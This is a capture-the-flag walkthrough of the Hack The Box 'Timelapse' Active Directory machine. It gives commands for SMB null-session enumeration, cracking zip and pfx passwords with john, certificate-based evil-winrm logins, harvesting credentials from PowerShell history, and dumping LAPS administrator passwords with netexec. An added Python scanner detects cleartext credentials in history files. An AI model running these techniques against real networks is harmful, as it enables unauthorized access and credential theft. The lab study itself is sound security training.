HTB: Timelapse

Introduction

Timelapse, an easy-rated Active Directory machine from Hack The Box, starts by finding a key on an SMB share. After cracking it open, we authenticate via Evil-WinRM. We then find credentials for the next user in the PowerShell history file. That user is a member of the LAPS_Readers group, which allows us to read local administrator passwords. With that, we get the administrator password and use Evil-WinRM to get a shell.

Recon

nmap

As always, start with an nmap scan:

sudo nmap -sC -sV -p- -v -oA nmap_scan/nmap_results 10.129.116.41

nmap finds 18 open TCP ports:
The combination of ports (Kerberos + LDAP + DNS + SMB) suggests this is a domain controller. In addition, the certificate on 5986 carries the hostname (dc01.timelapse.htb).

SMB - TCP 445

Take a look at SMB. First use netexec or smbclient to find out whether a null session is allowed.

netexec smb 10.129.116.41 --shares -u 'guest' -p ''

It is, and we have 2 readable shares. Next, use smbclient to take a closer look inside.

smbclient -N //10.129.116.41/Shares

There is an interesting file in the Shares share, winrm_backup.zip. Download it and take a look at it on our machine.

There were a few more files in the \helpdesk folder, but they turned out to be of no use.

Shell as legacyy

Exploring winrm_backup

The .zip file we downloaded is password protected. We have to get good old john to help there: use zip2john to get a hash and crack it.

zip2john winrm_backup.zip > ziphash.txt
john ziphash.txt --wordlist=~/Tools/rockyou.txt

And we have our first password! supremelegacy

The zip contains a single file: legacyy_dev_auth.pfx

Extracting certificate and key

A .pfx file is in PKCS#12 format and bundles the SSL certificate (public key) together with the corresponding private key. Sometimes you need the certificate and the private key as separate, unencrypted plain-text files to use them on another system. The steps below convert the .pfx file into .crt and .key files. More here.

When we try to extract … there is a password again, and unfortunately it is not supremelegacy this time :)

We have to reach for john again, this time with pfx2john:

pfx2john legacyy_dev_auth.pfx > pfx_hash
john pfx_hash --wordlist=~/Tools/rockyou.txt

And we get the second password: thuglegacy

With that we can try to extract the cert and key again:

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out pfx_key.key

It will ask you for a PEM pass phrase; you can put whatever you want there (at least 4 characters).

openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out pfx_cert.crt

Logging in

We now have everything we need to finally get into the machine.

Use evil-winrm with the freshly extracted pfx_key.key and pfx_cert.crt to get in:

  • -S - enable SSL, because we are connecting to 5986
  • -c pfx_cert.crt - provide the public key certificate
  • -k pfx_key.key - provide the private key
  • -i IP - host to connect to

evil-winrm -i 10.129.116.41 -k pfx_key.key -c pfx_cert.crt -S

And we can get our user flag.

Shell as svc_deploy

Looking around

As always, start with checking privileges and group memberships.

whoami /priv
net user legacyy

Nothing too interesting there; maybe the Development group could be useful later.

PowerShell History

One of the most important places to check is the PowerShell history (more here):

type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

The file contains a few lines, including one that connects to the host using the credentials of another user, svc_deploy.

So we have a new set of credentials: svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV
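As an added example (not part of the original write-up), here is a small defender-side scanner for a PSReadLine history file: it flags lines that carry cleartext credentials and masks the secret in its report, so reviewing history does not re-leak it. The history path is the one quoted above; the regex rules and the sample history are my own constructions, not the box's real file.

```python
"""Flag cleartext credentials left in a PowerShell PSReadLine history file."""
import re
from typing import Optional

# Per-user interactive history location quoted in the write-up ({user} placeholder is mine).
HISTORY_PATH = (r"C:\Users\{user}\AppData\Roaming\Microsoft\Windows"
                r"\PowerShell\PSReadLine\ConsoleHost_history.txt")

# Common shapes in which a secret lands in a session; named groups pull out secret and account.
SECRET_PATTERNS = [
    ("ConvertTo-SecureString -AsPlainText",
     re.compile(r"ConvertTo-SecureString\s+(['\"])(?P<secret>.*?)\1.*-AsPlainText", re.I)),
    ("PSCredential with literal username",
     re.compile(r"PSCredential\s*\(?\s*(['\"])(?P<user>[^'\"]+)\1", re.I)),
    ("-Password literal",
     re.compile(r"-Password\s+(['\"])(?P<secret>.*?)\1", re.I)),
    ("net use with inline password",  # the token right before /user: is the password
     re.compile(r"\bnet\s+use\b.*\s(?P<secret>\S+)\s+/user:(?P<user>\S+)", re.I)),
]

def redact(line: str, secret: Optional[str]) -> str:
    """Mask the captured secret so the report never re-leaks it."""
    return line.replace(secret, "***") if secret else line

def find_credential_leaks(history_text: str) -> list:
    """Return one finding per (line, rule) match: line number, rule, user, masked preview."""
    findings = []
    for lineno, line in enumerate(history_text.splitlines(), start=1):
        for rule, pattern in SECRET_PATTERNS:
            m = pattern.search(line)
            if m:
                g = m.groupdict()
                findings.append({"line": lineno, "rule": rule, "user": g.get("user"),
                                 "preview": redact(line.strip(), g.get("secret"))})
    return findings

# Constructed sample history (not the real file) shaped like the one described above.
SAMPLE_HISTORY = r"""whoami
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'Sup3rS3cret!' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('timelapse\svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so
net use Z: \\dc01\Shares Sup3rS3cret! /user:timelapse\legacyy
exit"""

if __name__ == "__main__":
    for f in find_credential_leaks(SAMPLE_HISTORY):
        print(f"line {f['line']:>2}  {f['rule']:<36}  user={f['user']}  {f['preview']}")
```

To review a real host, read the file at HISTORY_PATH (with the user name filled in) and pass its contents to find_credential_leaks.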


Shell

With the credentials we got in the previous step, we can use evil-winrm to log in as that user and continue enumeration.

Privilege Escalation

Enumeration

Logged in as svc_deploy, we need to check privileges and group memberships all over again.

And we find something really important! The user is a member of LAPS_Readers (more here).

This means we can read the LAPS-managed local administrator password.

There are 2 ways (that I know off the top of my head): either use netexec or PowerView.

Dump Admin password

Method 1: netexec

If there is no access to a PowerShell session, you can use the LAPS_Readers group privileges remotely through LDAP with:

netexec ldap 10.129.116.41 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -M laps

This dumps all the passwords the user is allowed to read, giving you a better foothold as a different user.

Method 2: PowerView

We can upload PowerView.ps1 to the host.

Import it into PowerShell.

And use Get-ADComputer to get the admin password.

Log in as admin

With the admin credentials we can once again use evil-winrm to log in and grab the root flag.